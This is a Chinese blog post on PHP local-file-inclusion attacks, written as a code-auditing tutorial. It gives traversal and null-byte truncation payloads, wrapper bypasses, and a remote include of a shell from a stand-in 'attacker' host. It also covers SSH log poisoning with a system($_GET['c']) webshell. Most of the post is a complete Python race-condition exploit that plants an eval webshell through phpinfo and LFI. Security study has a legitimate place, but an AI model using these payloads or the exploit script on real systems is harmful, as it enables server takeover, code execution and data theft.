PHP代码审计 文件包含专题

最新推荐文章于 2022-03-23 19:39:27 发布
最新推荐文章于 2022-03-23 19:39:27 发布
阅读量412 收藏 1
点赞数
分类专栏: php代码审计 安全 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/113650180
版权

基础分析

LFI
任意文件包含原理源码:即对包含文件没有进行过滤导致

<? php
 $f = $_GET['f'];
 include_once('sys/config.php');
 include($f);
?>
或者
<?php
include($_GET['f']);
?>

LFI漏洞利用思路总结

利用条件:

在php.ini文件中配置两个参数相关的协议
allow_url_fopen :on 默认开启 该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。
allow_url_include:off 默认关闭,该选项为on便是允许 包含URL 对象文件等。
在这里插入图片描述

特殊技巧

技巧1.存在文件包含时,但限制后缀时的包含技巧

<?php
$file = $_GET['file'].".php";
include($file);
?>
#如上面的包含

#绕过思路1-->可以利用zip伪协议或者phar伪协议的思路去绕
zip://a.png%23a
phar://shell.png/shell
#打包一个a.php的内容为a.zip,然后把a.zip改为a.png然后构造伪协议读取就ok了

#绕过思路2-->利用截断思路去绕
#几个典型的
?file=C://Windows//win.ini%00 (window,magic_quotes_gpc=off,网络上盛传PHP小于5.3.4有效,未完全进行测试,亲测 PHP 5.2.17有效,PHP-5.3.29-nts无效)
?file==../../../../../../../../../etc/passwd%00 (需要 magic_quotes_gpc=off,PHP小于5.3.4有效)
路径长度截断:
?file=../../../../../../../../../etc/passwd/././././././.[]/./././././.(php版本小于5.2.8(?)可以成功,linux需要文件名长于
4096,windows需要长于256)
点号截断:
?file=../../../../../../../../../boot.ini/………[]…………(php版本小于5.2.8(?)可以成功,只适用windows,点号需要长于
256)

在这里插入图片描述
技巧2.allow_url_include 关闭时 Getshell

攻击机开启共享
/1.php?file=//attacker/1.php
创建webdav服务,shell文件放入目录包含即可
>docker run -v /root/webdav:/var/lib/dav -e ANONYMOUS\_METHODS=GET,OPTIONS,PROPFIND -e LOCATION=/webdav -p 80:80 --rm --name webdav bytemark/webdav
Shell文件放入/root/webdav/data
/1.php?file=//attacker/1.php

技巧3
session + lfi getshell

session.upload\_progress.enabled启用时,文件上传会产生进度文件
/var/lib/php5/sess\_
/var/lib/php/sess\_

原理

技巧4
phpinfo+lfi getshell
原理
exp攻击

#!/usr/bin/python 
import sys
import threading
import socket

def setup(host, port):
    TAG="Security Test"
    PAYLOAD="""%s\r
<?php file_put_contents('/tmp/g', '<?=eval($_REQUEST[1])?>')?>\r""" % TAG
    REQ1_DATA="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
    padding="A" * 5000
    REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
HTTP_PRAGMA: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" %(len(REQ1_DATA),host,REQ1_DATA)
    #modify this to suit the LFI script   
    LFIREQ="""GET /lfi.php?file=%s HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
\r
\r
"""
    return (REQ1, TAG, LFIREQ)

def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.connect((host, port))
    s2.connect((host, port))

    s.send(phpinforeq)
    d = ""
    while len(d) < offset:
        d += s.recv(offset)
    try:
        i = d.index("[tmp_name] =&gt; ")
        fn = d[i+17:i+31]
    except ValueError:
        return None

    s2.send(lfireq % (fn, host))
    d = s2.recv(4096)
    s.close()
    s2.close()

    if d.find(tag) != -1:
        return fn

counter=0
class ThreadWorker(threading.Thread):
    def __init__(self, e, l, m, *args):
        threading.Thread.__init__(self)
        self.event = e
        self.lock =  l
        self.maxattempts = m
        self.args = args

    def run(self):
        global counter
        while not self.event.is_set():
            with self.lock:
                if counter >= self.maxattempts:
                    return
                counter+=1

            try:
                x = phpInfoLFI(*self.args)
                if self.event.is_set():
                    break                
                if x:
                    print "\nGot it! Shell created in /tmp/g"
                    self.event.set()
                    
            except socket.error:
                return
    

def getOffset(host, port, phpinforeq):
    """Gets offset of tmp_name in the php output"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    s.send(phpinforeq)
    
    d = ""
    while True:
        i = s.recv(4096)
        d+=i        
        if i == "":
            break
        # detect the final chunk
        if i.endswith("0\r\n\r\n"):
            break
    s.close()
    i = d.find("[tmp_name] =&gt; ")
    if i == -1:
        raise ValueError("No php tmp_name in phpinfo output")
    
    print "found %s at %i" % (d[i:i+10],i)
    # padded up a bit
    return i+256

def main():
    
    print "LFI With PHPInfo()"
    print "-=" * 30

    if len(sys.argv) < 2:
        print "Usage: %s host [port] [threads]" % sys.argv[0]
        sys.exit(1)

    try:
        host = socket.gethostbyname(sys.argv[1])
    except socket.error, e:
        print "Error with hostname %s: %s" % (sys.argv[1], e)
        sys.exit(1)

    port=80
    try:
        port = int(sys.argv[2])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with port %d: %s" % (sys.argv[2], e)
        sys.exit(1)
    
    poolsz=10
    try:
        poolsz = int(sys.argv[3])
    except IndexError:
        pass
    except ValueError, e:
        print "Error with poolsz %d: %s" % (sys.argv[3], e)
        sys.exit(1)

    print "Getting initial offset...",  
    reqphp, tag, reqlfi = setup(host, port)
    offset = getOffset(host, port, reqphp)
    sys.stdout.flush()

    maxattempts = 1000
    e = threading.Event()
    l = threading.Lock()

    print "Spawning worker pool (%d)..." % poolsz
    sys.stdout.flush()

    tp = []
    for i in range(0,poolsz):
        tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))

    for t in tp:
        t.start()
    try:
        while not e.wait(1):
            if e.is_set():
                break
            with l:
                sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
                sys.stdout.flush()
                if counter >= maxattempts:
                    break
        print
        if e.is_set():
            print "Woot!  \m/"
        else:
            print ":("
    except KeyboardInterrupt:
        print "\nTelling threads to shutdown..."
        e.set()
    
    print "Shuttin' down..."
    for t in tp:
        t.join()

if __name__=="__main__":
    main()

技巧5
LFI SSH Log

\>ssh '<?php system($\_GET\['c'\]); ?>'@192.168.0.107
>http://192.168.0.107/lfi.php?file=/var/log/auth.log&c=ls
goddemon
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
$_GET 变量
Zhang_Ning_的博客
09-06 578
PHP $_GET 变量 在 PHP 中,预定义的 $_GET 变量用于收集来自 method=“get” 的表单中的值。 $_GET 变量 预定义的 $_GET 变量用于收集来自 method=“get” 的表单中的值。 从带有 GET 方法的表单发送的信息,对任何人都是可见的(会显示在浏览器的地址栏),并且对发送信息的量也有限制。 实例 form.html 文件代码如下: <html&g...
php代码审计入坑实践.pdf
07-30
PHP 代码审计入坑实践》是一篇针对初学者的指南,旨在介绍如何开始进行PHP代码的安全审计。本文主要利用了RIPS等工具,通过实际操作来帮助新手逐步理解代码审计的过程。 首先,文章提到了“场景”,这可能是指...
PHP漏洞之文件包含漏洞
dogeace的博客
11-28 1760
php语言中存在着下面几个函数存在文件包含的的功能,这些函数的本意是方便开发者及用户实现某些功能,但是如果不对文件包含的内容进行严格的的限定,会被攻击者恶意利用。这就是php文件包含漏洞。下面有四个函数可以实现文件包含分别是: 1.include();用此函数包含的时候,如果出现错误,会提出警告,跳过此步骤继续执行剩下的代码。 2.require();此函数文件包含出现错误的时候,终止程序的运行,与include()区别就是这里。 3.include_once()与1的唯一区别是文件只被包含一次,避免文
CTFshow web入门——文件包含
小元砸的博客
02-07 3459
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
PHP文件包含漏洞
Jim的博客
08-17 1279
PHP文件包含可以直接执行包含文件的代码,包含的文件格式是不受限制的。 文件包含分为本地文本包含(local file include)和远程文件包含(remote file include) 文件包含函数有:include(),include_once(),require()和require_once() 1.本地文件包含是指只能包含本机文件的包含漏洞,大多出现在模块加载,模板加载和ca
文件包含漏洞
nobugnomoney的博客
03-23 5035
一、文件包含漏洞原理 PHP语言提供的文件包含功能太强大,太灵活,所以包含漏洞常常出现在PHP中,但不只是PHP中有包含漏洞,其他语言也有包含漏洞,如java等,本篇主要以PHP为例讲解原理及其利用技巧: PHP提供4个文件包含的函数 1、include():找不到文件时继续执行,只会警告 2、include_once():与include()类似,只是如果文件中的代码已被包含,则不会再次包含 3、require():找不到文件时会爆出致命的错误; 4、require_once():与上述的类似; 1、本地
PHP代码审计音频文件.zip
11-02
任务13:PHP代码审计之目录穿越及文件包含漏洞mp4 任务12:PHP代码审计之文件上传漏洞mp4 任务11:代码审计之CSRF漏洞mp4 任务10:代码审计之XSS漏洞mp4 任务9:代码审计之命令执行漏洞mp4 任务8:代码审计之代码执行...
PHP代码审计文档.zip
11-02
第13课:PHP代码审计之目录穿越及文件包含漏洞mp4 第12课:PHP代码审计之文件上传漏洞mp4 第11课:代码审计之CSRF漏洞mp4 第10课:代码审计之XSS漏洞mp4 第9课:代码审计之命令执行漏洞mp4 第8课:代码审计之代码执行...
PHP代码审计教学视频
01-28
PHP代码审计入门教学视频,对新手代码审计比较友好。对一些常规的漏洞(sqli、XSS、变量覆盖、PHPSTROM使用等等)都有非常详细的介绍
PHP代码审计资料整理
03-04
PHP代码审计是软件开发过程中的一个重要...在“代码审计资料整理”中,你将找到关于以上各个方面的详细资料,包括实例、案例分析和解决方案,帮助你提升PHP代码审计的技能,确保开发出更安全、更可靠的PHP应用程序。
【转载】php伪协议实现命令执行的七种姿势
gclome的博客
11-08 320
原文 首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file,计划对文件包含漏洞与php封装协议的利用方法进行总结,本篇先总结下一些封装协议,涉及的相关协议:file://、php://filter、php://input、zip://、compress.bzip2://、compress.zlib://、da
java代码审计文件包含_代码审计--一道简单的文件包含题目的多种利用方式
weixin_28689507的博客
03-02 579
不知出自哪次CTF前言:本萌新最近在学习代码审计,有一天在水群聊到代码审计如何学习,然后某dalao丢给我一道题,说你对这题有什么看法,本萌新一看,这不是很简单吗,想也没多想就直接上去?file=flag.php,然后被dalao指教了一番,于是就有了这篇文章。目录:NO.1 传统方法首先来看下代码error_reporting(0);if(@isset($_GET["file"])){inclu...
PHP代码审计笔记--文件包含漏洞
11-06 78
有限制的本地文件包含: <?php include($_GET['file'].".php"); ?> %00截断: ?file=C://Windows//win.ini%00 (window,magic_quotes_gpc=off,网络上盛传PHP小于5.3.4有效,未完全进行测试,亲测 PHP 5.2.17有效,PHP-5.3.29...
[BUUCTF][PHP本地文件包含]LFI COURSE 1
Terran1ight的博客
03-09 4898
<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */ highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } 点进去后就上面一段PHP代码审计,根据不断的百度翻译各种函数的意思,觉得应该是本地文件包含 看了别.
PHP 面试题
mysteryflower的专栏
09-29 1338
原文转自: https://mp.weixin.qq.com/s/_fXZfQRdW7Lf8yLTbjUoyA https://www.php.cn/php-weizijiaocheng-429251.html 1.请自我介绍一下? 答:我叫 xxx,来自北京,20xx 年毕业于 xx 大学计算机 xx 系,毕业后在武汉从事了 x 年的 php 开发工作,公司是一个外包公司,主要做...
php本地文件包含&远程文件包含
think_ycx的专栏
04-07 7730
本地文件包含&远程文件包含
PHP代码审计一(PHP核心配置详解)
qq_45521281的博客
05-15 386
前言 代码在不同环境下执行的结果也会大有不同,可能就是因为一个简简单单的配置问题,导致一个非常高危的漏洞能够利用;也可能你已经找到一个漏洞就因为你的配置问题,导致你弄了好久都无法构造成功的漏洞利用代码。然而,在不同的PHP版本中配置指令也会有不一样的地方,新的版本可能会增加或者删除部分指令,改变指令默认设置或者固定设置命令,因此,我们在代码审计之前需要非常熟悉PHP各个版本中配置文件的核心指令,才可以高效的挖掘到高质量的漏洞。 PHP常见的基本设置 (1)open_basedir设置 open_based
详解文件包含漏洞
bangyan3903的博客
08-15 572
文件包含漏洞触发前提: allow_url_fopen = On && allow_url_include = Off 此时才可以触发本地文件包含漏洞 allow_url_fopen = On && allow_url_include = On 此时才可以触发远程文件包含漏洞 其中,allow_url_fopen一直都是默认开...
PHP代码审计:代码执行漏洞深度剖析
"php代码审计-代码执行.pdf" 这篇文档主要探讨了PHP代码审计中的一个重要主题——代码执行,这是渗透测试中常见的安全问题。通过代码审计,开发者和安全专家可以识别并修复潜在的安全漏洞,防止恶意攻击者利用这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值